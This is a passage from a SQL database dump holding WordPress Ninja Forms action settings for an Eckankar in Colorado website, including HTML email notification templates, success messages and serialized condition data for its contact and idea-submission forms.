/>\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(746,30,'attach_csv','0','attach_csv','0'),(747,30,'email_format','html','email_format','html'),(748,30,'reply_to','','reply_to',''),(749,30,'cc','','cc',''),(750,30,'bcc','','bcc',''),(751,30,'redirect_url','','redirect_url',''),(752,30,'success_msg','','success_msg',''),(753,30,'label','Send copy to user','label','Send copy to user'),(754,30,'objectType','Action','objectType','Action'),(755,30,'objectDomain','actions','objectDomain','actions'),(756,30,'editActive','','editActive',''),(757,30,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(758,30,'payment_gateways','','payment_gateways',''),(759,30,'payment_total','0','payment_total','0'),(760,30,'tag','','tag',''),(761,30,'email_message_plain','','email_message_plain',''),(762,30,'parent_id','8','parent_id','8'),(763,31,'title','','title',''),(764,31,'key','','key',''),(765,31,'type','successmessage','type','successmessage'),(766,31,'active','1','active','1'),(767,31,'created_at','2018-01-03 11:42:46','created_at','2018-01-03 11:42:46'),(768,31,'date_updated','2016-01-15','date_updated','2016-01-15'),(769,31,'from_name','','from_name',''),(770,31,'from_address','','from_address',''),(771,31,'to','{wp:admin_email}','to','{wp:admin_email}'),(772,31,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(773,31,'email_message','{fields_table}','email_message','{fields_table}'),(774,31,'attach_csv','0','attach_csv','0'),(775,31,'email_format','html','email_format','html'),(776,31,'reply_to','','reply_to',''),(777,31,'cc','','cc',''),(778,31,'bcc','','bcc',''),(779,31,'redirect_url','','redirect_url',''),(780,31,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(781,31,'label','Success Message','label','Success Message'),(782,31,'objectType','Action','objectType','Action'),(783,31,'objectDomain','actions','objectDomain','actions'),(784,31,'editActive','','editActive',''),(785,31,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(786,31,'payment_gateways','','payment_gateways',''),(787,31,'payment_total','0','payment_total','0'),(788,31,'tag','','tag',''),(789,31,'email_message_plain','','email_message_plain',''),(790,31,'parent_id','8','parent_id','8'),(791,32,'title','','title',''),(792,32,'key','','key',''),(793,32,'type','email','type','email'),(794,32,'active','1','active','1'),(795,32,'created_at','2018-01-03 11:42:46','created_at','2018-01-03 11:42:46'),(796,32,'date_updated','2016-01-19','date_updated','2016-01-19'),(797,32,'from_name','Central Colorado Leadership Communications','from_name','Central Colorado Leadership Communications'),(798,32,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(799,32,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(800,32,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(801,32,'email_message','<p>{field:lastname_22}{field:textbox_21}{field:textbox_21}<br><br><br><br><br><br><br><br><br><br><br><br></p><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr>  <td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Central Colorado Leadership Communications</span> form submission.<br><br><br> </strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Central Colorado ECK organization</em>.<br><br><br> <strong><br><br><br>The following person has requested contact with an ECK representative. Here is the information that </strong> <span style=\"color: #666666\" ;=\"\">{field:textbox_21} {field:lastname_22}</span> has submitted:</p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_21}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_22}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_23}<br><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_24}</span><br><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_25}<br><br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_28}</span></p><br><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_29}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the<br><br><br> Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p><p></p>','email_message','<p>{field:lastname_22}{field:textbox_21}{field:textbox_21}<br><br><br><br><br><br><br><br><br><br><br><br></p><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr>  <td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Central Colorado Leadership Communications</span> form submission.<br><br><br> </strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Central Colorado ECK organization</em>.<br><br><br> <strong><br><br><br>The following person has requested contact with an ECK representative. Here is the information that </strong> <span style=\"color: #666666\" ;=\"\">{field:textbox_21} {field:lastname_22}</span> has submitted:</p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_21}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_22}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_23}<br><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_24}</span><br><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_25}<br><br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_28}</span></p><br><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_29}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the<br><br><br> Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p><p></p>'),(802,32,'attach_csv','0','attach_csv','0'),(803,32,'email_format','html','email_format','html'),(804,32,'reply_to','','reply_to',''),(805,32,'cc','','cc',''),(806,32,'bcc','','bcc',''),(807,32,'redirect_url','','redirect_url',''),(808,32,'success_msg','','success_msg',''),(809,32,'label','Admin Email','label','Admin Email'),(810,32,'objectType','Action','objectType','Action'),(811,32,'objectDomain','actions','objectDomain','actions'),(812,32,'editActive','','editActive',''),(813,32,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(814,32,'payment_gateways','','payment_gateways',''),(815,32,'payment_total','0','payment_total','0'),(816,32,'tag','','tag',''),(817,32,'email_message_plain','','email_message_plain',''),(818,32,'drawerDisabled','','drawerDisabled',''),(819,32,'parent_id','8','parent_id','8'),(820,33,'title','','title',''),(821,33,'key','','key',''),(822,33,'type','save','type','save'),(823,33,'active','1','active','1'),(824,33,'created_at','2018-01-03 11:45:34','created_at','2018-01-03 11:45:34'),(825,33,'label','Save Form','label','Save Form'),(826,33,'objectType','Action','objectType','Action'),(827,33,'objectDomain','actions','objectDomain','actions'),(828,33,'editActive','','editActive',''),(829,33,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(830,33,'payment_gateways','','payment_gateways',''),(831,33,'payment_total','0','payment_total','0'),(832,33,'tag','','tag',''),(833,33,'to','{wp:admin_email}','to','{wp:admin_email}'),(834,33,'reply_to','','reply_to',''),(835,33,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(836,33,'email_message','{fields_table}','email_message','{fields_table}'),(837,33,'email_message_plain','','email_message_plain',''),(838,33,'from_name','','from_name',''),(839,33,'from_address','','from_address',''),(840,33,'email_format','html','email_format','html'),(841,33,'cc','','cc',''),(842,33,'bcc','','bcc',''),(843,33,'redirect_url','','redirect_url',''),(844,33,'parent_id','9','parent_id','9'),(845,34,'title','','title',''),(846,34,'key','','key',''),(847,34,'type','email','type','email'),(848,34,'active','1','active','1'),(849,34,'created_at','2018-01-03 11:45:34','created_at','2018-01-03 11:45:34'),(850,34,'date_updated','2016-01-15','date_updated','2016-01-15'),(851,34,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(852,34,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(853,34,'to','{field:email_241}','to','{field:email_241}'),(854,34,'email_subject','Eckankar in Colorado Chela Ideas','email_subject','Eckankar in Colorado Chela Ideas'),(855,34,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_239},</strong></p><br /><br />\r\n<p>Thanks for getting in touch!Â  You have created a new form submission on the Eckankar In Colorado website where you detailed a new idea to help grow ECK In Colorado.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_239}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_240}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_241}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_242}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_243}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #23507d\"><strong>Information Submitted:</strong></span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>Give Your Idea A Title :</strong> {field:textbox_256}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Enter The Details of Your Idea:</strong> {field:textarea_253}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Why Should It Be Done (what is the spiritual purpose?) :</strong> {field:textbox_257}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Who Will Do It (you or someone else?):</strong> {field:textbox_258}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>How Many People Will Be Required To Make This Happen?:</strong> {field:textbox_259}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>When Would This Happen?:</strong> {field:textbox_263}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Where Would This Happen?:</strong> {field:textbox_264}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>What Is The Anticipated Cost To Implement This Idea?:</strong> {field:textbox_265}<br /><br /><br />\r\n </span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">Your idea will be forwarded to the appropriate individual at Colorado Eckankar and you will be contacted soon. If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_239},</strong></p><br /><br />\r\n<p>Thanks for getting in touch!Â  You have created a new form submission on the Eckankar In Colorado website where you detailed a new idea to help grow ECK In Colorado.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_239}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_240}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_241}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_242}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_243}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #23507d\"><strong>Information Submitted:</strong></span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>Give Your Idea A Title :</strong> {field:textbox_256}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Enter The Details of Your Idea:</strong> {field:textarea_253}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Why Should It Be Done (what is the spiritual purpose?) :</strong> {field:textbox_257}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Who Will Do It (you or someone else?):</strong> {field:textbox_258}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>How Many People Will Be Required To Make This Happen?:</strong> {field:textbox_259}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>When Would This Happen?:</strong> {field:textbox_263}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Where Would This Happen?:</strong> {field:textbox_264}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>What Is The Anticipated Cost To Implement This Idea?:</strong> {field:textbox_265}<br /><br /><br />\r\n </span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">Your idea will be forwarded to the appropriate individual at Colorado Eckankar and you will be contacted soon. If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(856,34,'attach_csv','0','attach_csv','0'),(857,34,'email_format','html','email_format','html'),(858,34,'reply_to','','reply_to',''),(859,34,'cc','','cc',''),(860,34,'bcc','','bcc',''),(861,34,'redirect_url','','redirect_url',''),(862,34,'success_msg','','success_msg',''),(863,34,'label','Send copy to user','label','Send copy to user'),(864,34,'objectType','Action','objectType','Action'),(865,34,'objectDomain','actions','objectDomain','actions'),(866,34,'editActive','','editActive',''),(867,34,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(868,34,'payment_gateways','','payment_gateways',''),(869,34,'payment_total','0','payment_total','0'),(870,34,'tag','','tag',''),(871,34,'email_message_plain','','email_message_plain',''),(872,34,'parent_id','9','parent_id','9'),(873,35,'title','','title',''),(874,35,'key','','key',''),(875,35,'type','successmessage','type','successmessage'),(876,35,'active','1','active','1'),(877,35,'created_at','2018-01-03 11:45:34','created_at','2018-01-03 